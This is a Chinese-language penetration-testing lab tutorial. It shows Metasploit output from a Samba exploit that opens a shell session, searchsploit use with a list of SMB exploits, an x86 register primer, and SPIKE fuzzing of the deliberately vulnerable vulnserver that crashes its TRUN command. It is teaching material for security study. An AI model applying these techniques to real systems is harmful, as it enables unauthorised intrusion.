[-] Handler failed to bind to 192.168.10.184:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[-] 193.168.10.183:139 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
msf6 exploit(multi/samba/usermap_script) > [*] Command shell session 1 opened (192.168.10.184:4444 -> 192.168.10.183:45742) at 2021-03-17 22:40:18 -0400
msf6 exploit(multi/samba/usermap_script) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               192.168.10.184:4444 -> 192.168.10.183:45742 (192.168.10.183)

漏洞EXP查找与使用方法

EXP获取捷径

  • 使用Exploit-DB搜索漏洞:https://www.exploit-db.com/
  • SecurityFocus 安全焦点:https://www.securityfocus.com/

Searchsploit工具介绍

  • 在终端输入searchsploit -h查看使用帮助。
┌──(root💀kali)-[~/桌面]
└─# searchsploit -h
  Usage: searchsploit [options] term1 [term2] ... [termN]

==========
 Examples 
==========
  searchsploit afd windows local
  searchsploit -t oracle windows
  searchsploit -p 39446
  searchsploit linux kernel 3.2 --exclude="(PoC)|/dos/"
  searchsploit -s Apache Struts 2.0.0
  searchsploit linux reverse password
  searchsploit -j 55555 | json_pp

  For more examples, see the manual: https://www.exploit-db.com/searchsploit

=========
 Options 
=========
## Search Terms
   -c, --case     [Term]      Perform a case-sensitive search (Default is inSEnsITiVe)
   -e, --exact    [Term]      Perform an EXACT & order match on exploit title (Default is an AND match on each term) [Implies "-t"]
                                e.g. "WordPress 4.1" would not be detect "WordPress Core 4.1")
   -s, --strict               Perform a strict search, so input values must exist, disabling fuzzy search for version range
                                e.g. "1.1" would not be detected in "1.0 < 1.3")
   -t, --title    [Term]      Search JUST the exploit title (Default is title AND the file's path)
       --exclude="term"       Remove values from results. By using "|" to separate, you can chain multiple values
                                e.g. --exclude="term1|term2|term3"
...
  • 搜索windows漏洞。
┌──(root💀kali)-[~/桌面]
└─# searchsploit windows smb                                                                                                     
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title                                                                                                                                                                                            |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
CyberCop Scanner Smbgrind 5.5 - Buffer Overflow (PoC)                                                                                                                                                     | windows/dos/39452.txt
Microsoft - SMB Server Trans2 Zero Size Pool Alloc (MS10-054)                                                                                                                                             | windows/dos/14607.py
Microsoft DNS RPC Service - 'extractQuotedChar()' Remote Overflow 'SMB' (MS07-029) (Metasploit)                                                                                                           | windows/remote/16366.rb
Microsoft SMB Driver - Local Denial of Service                                                                                                                                                            | windows/dos/28001.c
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010)                                                                                 | windows/remote/43970.rb
Microsoft Windows - 'SMB' Transaction Response Handling (MS05-011)                                                                                                                                        | windows/dos/1065.c
Microsoft Windows - 'SMBGhost' Remote Code Execution                                                                                                                                                      | windows/remote/48537.py
Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050)                                                                                                                                     | windows/remote/40280.py
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050)                                                                                                              | windows/remote/14674.txt
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit)                                                                                                 | windows/remote/16363.rb
Microsoft Windows - 'WRITE_ANDX' SMB Command Handling Kernel Denial of Service (Metasploit)                                                                                                               | windows/dos/6463.rb
Microsoft Windows - LSASS SMB NTLM Exchange Null-Pointer Dereference (MS16-137)                                                                                                                           | windows/dos/40744.txt
Microsoft Windows - SMB Client-Side Bug (PoC) (MS10-006)                                                                                                                                                  | windows/dos/12258.py
Microsoft Windows - SMB Relay Code Execution (MS08-068) (Metasploit)                                                                                                                                      | windows/remote/16360.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit)                                                                                                                             | windows/dos/41891.rb
Microsoft Windows - SMB2 Negotiate Protocol '0x72' Response Denial of Service                                                                                                                             | windows/dos/12524.py
Microsoft Windows - SmbRelay3 NTLM Replay (MS08-068)                                                                                                                                                      | windows/remote/7125.txt
Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Buffer Overflow (PoC)                                                                                              | windows/dos/48216.md
Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation                                                                                         | windows/local/48267.txt
Microsoft Windows 10 - SMBv3 Tree Connect (PoC)                                                                                                                                                           | windows/dos/41222.py
Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation                                                                                                               | windows/local/47115.txt
Microsoft Windows 2000/XP - SMB Authentication Remote Overflow                                                                                                                                            | windows/remote/20.txt
Microsoft Windows 2003 SP2 - 'ERRATICGOPHER' SMB Remote Code Execution                                                                                                                                    | windows/remote/41929.py
Microsoft Windows 2003 SP2 - 'RRAS' SMB Remote Code Execution                                                                                                                                             | windows/remote/44616.py
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                                                                                                          | windows/remote/42031.py
Microsoft Windows 7/2008 R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC)                                                                                                                           | windows/dos/12273.py
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                                                                                      | windows/remote/42315.py
Microsoft Windows 8.1/2012 R2 - SMBv3 Null Pointer Dereference Denial of Service                                                                                                                          | windows/dos/44189.py
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                                                                                                | windows_x86-64/remote/42030.py
Microsoft Windows 95/Windows for Workgroups - 'smbclient' Directory Traversal                                                                                                                             | windows/remote/20371.txt
Microsoft Windows NT 4.0 SP5 / Terminal Server 4.0 - 'Pass the Hash' with Modified SMB Client                                                                                                             | windows/remote/19197.txt
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)                                                                                                             | windows_x86-64/remote/41987.py
Microsoft Windows SMB Server (v1/v2) - Mount Point Arbitrary Device Open Privilege Escalation                                                                                                             | windows/dos/43517.txt
Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote Blue Screen of Death (MS07-063)                                                                                                      | windows/dos/9594.txt
Microsoft Windows XP/2000 - 'Mrxsmb.sys' Local Privilege Escalation (MS06-030)                                                                                                                            | windows/local/1911.c
Microsoft Windows XP/2000/NT 4.0 - Network Share Provider SMB Request Buffer Overflow (1)                                                                                                                 | windows/dos/21746.c
Microsoft Windows XP/2000/NT 4.0 - Network Share Provider SMB Request Buffer Overflow (2)                                                                                                                 | windows/dos/21747.txt
VideoLAN VLC Client (Windows x86) - 'smb://' URI Buffer Overflow (Metasploit)                                                                                                                             | windows_x86/local/16678.rb
VideoLAN VLC Media Player 0.8.6f - 'smb://' URI Handling Remote Buffer Overflow                                                                                                                           | windows/remote/9303.c
VideoLAN VLC Media Player 0.8.6f - 'smb://' URI Handling Remote Universal Buffer Overflow                                                                                                                 | windows/remote/9318.py
VideoLAN VLC Media Player 0.9.9 - 'smb://' URI Stack Buffer Overflow (PoC)                                                                                                                                | windows/dos/9029.rb
VideoLAN VLC Media Player 1.0.0/1.0.1 - 'smb://' URI Handling Buffer Overflow (PoC)                                                                                                                       | windows/dos/9427.py
VideoLAN VLC Media Player 1.0.2 - 'smb://' URI Stack Overflow                                                                                                                                             | windows/remote/9816.py
VideoLAN VLC Media Player 1.0.3 - 'smb://' URI Handling Remote Stack Overflow (PoC)                                                                                                                       | windows/dos/10333.py
VideoLAN VLC Media Player < 1.1.4 - '.xspf smb://' URI Handling Remote Stack Overflow (PoC)                                                                                                               | windows/dos/14892.py
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

自行编译使用EXP

  • C语言EXP编译与使用gcc 文件名 -o 输出文件名
  • Python使用EXPpython 文件名

Windows 缓冲区溢出0day 挖掘+利用

Windows寄存器介绍

  • 寄存器Register是CPU中高速存储,每一个进程执行都需要寄存器存储数据。X86和X64区别:基于Inter32位系统和64位系统
  • 汇编语言:机器语言的简单替换JMP->01010101
  • 通用寄存器:
    • 累加器(EAX)
    • 基址寄存器(EBX)
    • 计数器(ECX)
    • 数据存储器(EDX)
    • 扩展基址寄存器(EBP)
    • 源变址寄存器(ESI)
    • 目的变址寄存器(EDI)
    • 栈指针寄存器(ESP)
  • 前面4个寄存器(累加器(EAX)、基址寄存器(EBX)、计数器(ECX)、数据存储器(EDX))主要用于算术运算;后面4个寄存器(扩展基址指针寄存器(EBP)、源变址寄存器(ESI)、目的变址寄存器(EDI)、栈指针寄存器(ESP)主要用于保存内存地址的指针。
  • 指令指针寄存器(EIP)。程序运行时,EIP会存放程序执行的下一命令的地址,告诉CPU接下来要做什么。
  • 段寄存器。段是一种内存保护技术,它把内存划分为多个区段,并为每个区段斌予起始地址、范围、访问权限等,以保护内存。段寄存器主要包括CS代码段寄存器、SS栈段寄存器、DS数据段寄存器、ES附加(数据)段寄存器、FS数据段寄存器、GS数据段寄存器。
  • 程序状态与控制寄存器。EFLAGS共计32位,每1位的值为0或1,代表off或on,我们前期只需要关注ZF(零标准),OF(溢出标志),CF(进位标志)。

实验环境搭建

  • 实验将采用一个具有缓冲区溢出安全漏洞的exe为例。
  • 下载:https://github.com/stephenbradshaw/vulnserver
  • 下载完成后解压后得到一个zip的压缩文件。
  • 在命令终端使用运行exe文件,运行格式vulnserver.exe端口号,默认端口号9999。

  • 使用netstat -an | find “端口号”,查看是否占用端口。

  • 在Kali Linux中使用netcat连接运行vulnserver.exe进行连接测试。并且执行HELP获取帮助信息。
┌──(root💀kali)-[~/桌面]
└─# nc 192.168.1.102 9999                                                                                                      
Welcome to Vulnerable Server! Enter HELP for help.
UNKNOWN COMMAND
HELP
Valid Commands:
HELP
STATS [stat_value]
RTIME [rtime_value]
LTIME [ltime_value]
SRUN [srun_value]
TRUN [trun_value]
GMON [gmon_value]
GDOG [gdog_value]
KSTET [kstet_value]
GTER [gter_value]
HTER [hter_value]
LTER [lter_value]
KSTAN [lstan_value]
EXIT

模糊测试实践

  • 在Kali Linux下默认继承安全了SPIKE模糊测试工具包,可以使用generic_+2次TAB输出工具包的工具。
┌──(root💀kali)-[~]
└─# generic_
generic_chunked           generic_listen_tcp        generic_send_tcp          generic_send_udp          generic_web_server_fuzz   generic_web_server_fuzz2
  • 由于服务器端使用TCP,所以对于TCP模糊测试需要使用generic_send_tcp工具。直接输入工具获取帮助信息。
┌──(root💀kali)-[~/桌面]
└─# generic_send_tcp                                                                                                                                                                                                                   
argc=1
Usage: ./generic_send_tcp host port spike_script SKIPVAR SKIPSTR
./generic_send_tcp 192.168.1.100 701 something.spk 0 0
  • 编写SPIKE脚本,默认脚本存储位置:/usr/share/spike/。
┌──(root💀kali)-[~/桌面]
└─# ls /usr/share/spike/                                                                                                                                                                                                        
audits  backups  data  dcedump  include  testscripts
  • SPIKE脚本是以.spk为结尾,并且脚本文件中具有特定方法。

  • s_randine(),从服务器读取一行内容,s_string(“字符串”)。

  • s_string(“string”); // 打印字符串,内容为“string”。
  • s_string_reqpeat(“string”, 200); // 重复字符串“string” 200次。
  • s_string_variable(“string”); // 将模糊字符串插入“SPIKE”,字符串“string”将用于此变量的迭代。
┌──(root💀kali)-[~]
└─# cat fuzz.spk
s_readline();
s_string("SRUN |");
s_string_variable("VALUE");
  • 使用generic_send_tcp测试。
┌──(root💀kali)-[~/桌面]
└─# generic_send_tcp 192.168.1.102 9999 fuuz.spk 0 0 
Total Number of Strings is 681
Fuzzing
Fuzzing Variable 0:0
generic_send_tcp: undefined symbol: s_randline
  • 服务器没有发生异常。

  • 接下来测试TRUN参数。
┌──(root💀kali)-[~]
└─# cat fuzz.spk
s_readline();
s_string("TRUN |");
s_string_variable("VALUE");
  • 服务器异常,自动退出。表明当前TRUN参数存在安全漏洞。